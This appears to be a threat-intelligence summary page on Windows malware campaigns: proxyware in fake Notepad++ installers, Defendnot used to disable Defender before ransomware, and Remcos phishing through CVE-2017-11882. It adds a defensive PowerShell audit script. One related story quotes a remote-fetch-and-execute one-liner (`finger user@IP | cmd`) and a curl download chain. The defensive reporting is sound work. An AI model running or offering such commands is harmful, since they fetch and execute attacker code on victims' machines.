
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware

Tags: defense-evasion-method, loader-delivery-mechanism, phishing-campaign-intelligence, remote-access-implant, initial-access-method

Updated March 21, 2026 at 02:48 PM · 3 sources

Multiple active malware campaigns are using social engineering and trojanized content to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to Larva-25012 that distributes fake installers (notably a trojanized Notepad++ package) via cracked-software sites; the Setup.zip bundle includes a legitimate Setup.exe plus a malicious sideloaded DLL (TextShaping.dll) that decrypts and installs DPLoader for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed proxyware.

Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (GitHub and Dropbox) for payload hosting and weaponizes Defendnot (a Windows Security Center trust-model research tool) to disable Microsoft Defender before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver Remcos RAT, including fileless execution behavior and exploitation of CVE-2017-11882 (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
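The Defender tampering and the Defendnot trick described above both leave state that a defender can audit. The PowerShell check below is an added example, not code from AhnLab, Fortinet or any of the reports summarized here; it assumes a stock Windows 10/11 workstation where the Defender cmdlets and the `root\SecurityCenter2` WMI namespace exist, and the `$KnownAv` allow-list is an assumption to adapt to your estate.

```powershell
# Added example (not from the original reports): audit a host for the Defender
# tampering patterns described above (exclusions, sample submission, cloud
# protection, real-time monitoring) and for unexpected antivirus registrations in
# Windows Security Center, the mechanism a Defendnot-style tool relies on to push
# Defender into passive mode. Assumes Windows 10/11 with Defender cmdlets and the
# root\SecurityCenter2 namespace (not present on Windows Server).

$KnownAv = @('Windows Defender')   # assumption: Defender is the only expected AV

$pref     = Get-MpPreference
$status   = Get-MpComputerStatus
$findings = New-Object System.Collections.Generic.List[string]

# 1. Exclusions silently remove coverage without turning Defender off.
foreach ($kind in 'ExclusionPath', 'ExclusionProcess', 'ExclusionExtension') {
    $values = $pref.$kind
    if ($values) { $findings.Add("$kind configured: $($values -join '; ')") }
}

# 2. Sample submission (2 = never send) and cloud protection (MAPSReporting 0 =
#    disabled) are the settings that blind Defender to fresh loaders.
if ($pref.SubmitSamplesConsent -eq 2) { $findings.Add('Sample submission set to Never send') }
if ($pref.MAPSReporting -eq 0)        { $findings.Add('Cloud-delivered protection (MAPS) disabled') }

# 3. Real-time monitoring disabled by preference or reported off by the engine.
if ($pref.DisableRealtimeMonitoring -or -not $status.RealTimeProtectionEnabled) {
    $findings.Add('Real-time protection is disabled')
}
if (-not $status.AntivirusEnabled) { $findings.Add('Defender antivirus engine reports disabled') }

# 4. Any AV product registered in Security Center that is not on the allow-list
#    is worth a look: a spoofed registration is exactly what Defendnot produces.
$avProducts = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct
foreach ($av in $avProducts) {
    if ($KnownAv -notcontains $av.displayName) {
        $findings.Add("Unexpected AV registration: '$($av.displayName)' exe=$($av.pathToSignedProductExe)")
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No Defender tampering indicators found.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```

Run it once on a known-clean build to capture the baseline, then diff the output across the fleet; a new exclusion or a second AV registration appearing on a single host is the signal to pivot into that machine's scheduled tasks and recently written DLLs.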

Timeline

  1. Jan 22, 2026

    ASEC warns of Larva-25012 fake Notepad++ installer proxyjacking campaign

    AhnLab Security Intelligence Center warned that threat actor Larva-25012 is distributing trojanized Notepad++ installers through fake software download sites aimed at users seeking cracked or pirated software. The malware uses DLL side-loading to install DPLoader, weakens Windows Defender, persists via scheduled tasks, and monetizes victims by installing proxyware such as Infatica and DigitalPulse.

  2. Jan 22, 2026

    FortiGuard reports Russia-focused campaign abusing Defendnot and cloud services

    FortiGuard Labs disclosed a multi-stage campaign targeting users in Russia that uses business-themed decoy documents, weaponized Defendnot to disable Microsoft Defender, and payload hosting on GitHub and Dropbox. The intrusion deploys Amnesia RAT and later ransomware and WinLocker components for persistent control, credential theft, and data denial.

  3. Jan 21, 2026

    Fortinet identifies phishing campaign delivering Remcos via shipping lures

    Fortinet analysts reported a phishing campaign using fake shipping emails with malicious Word documents that fetch remote templates and exploit CVE-2017-11882 to install Remcos RAT. The attack uses fileless execution, scheduled-task persistence, and TLS command-and-control to evade detection and maintain access on Windows systems.


Related Stories

Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware

Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi-Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva-25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.

1 month ago

Windows Malware Campaigns Abusing Trusted Tools and Cloud Hosting for Stealthy Execution

Multiple Windows-focused malware campaigns were reported leveraging *trusted distribution and execution paths* rather than exploiting software vulnerabilities. One campaign attributed to **Larva-25012** disguised proxyware as legitimate *Notepad++* installers distributed via fake cracked-software portals and deceptive ads, primarily impacting South Korea. The payloads were hosted on GitHub and delivered as MSI/ZIP packages containing legitimate components plus malicious DLLs, using **DLL side-loading** and process injection into **Windows Explorer** to deploy proxyware (e.g., **Infatica** and **DigitalPulse**) for **proxyjacking**—monetizing victims’ internet bandwidth by reselling access through their networks. A separate multi-stage Windows malware operation used business-themed lures and weaponized archives containing **LNK** shortcuts to run hidden **PowerShell** with execution-policy bypass, pulling an obfuscated loader from GitHub and using legitimate services (e.g., **Dropbox**) to blend into normal traffic. Fortinet-reported tradecraft included persistence, decoy document generation, and beaconing via the **Telegram Bot API**, followed by defense evasion through abuse of **Defendnot** to disable Microsoft Defender before dropping follow-on payloads such as ransomware, banking trojans, and surveillance tooling. Additional reporting highlighted a broader trend of attackers abusing legitimate infrastructure and admin tooling (including **RMM** software after credential theft) to establish persistent access, while generic “common threats” content provided no incident-specific intelligence.

1 month ago

Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads

Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.

1 month ago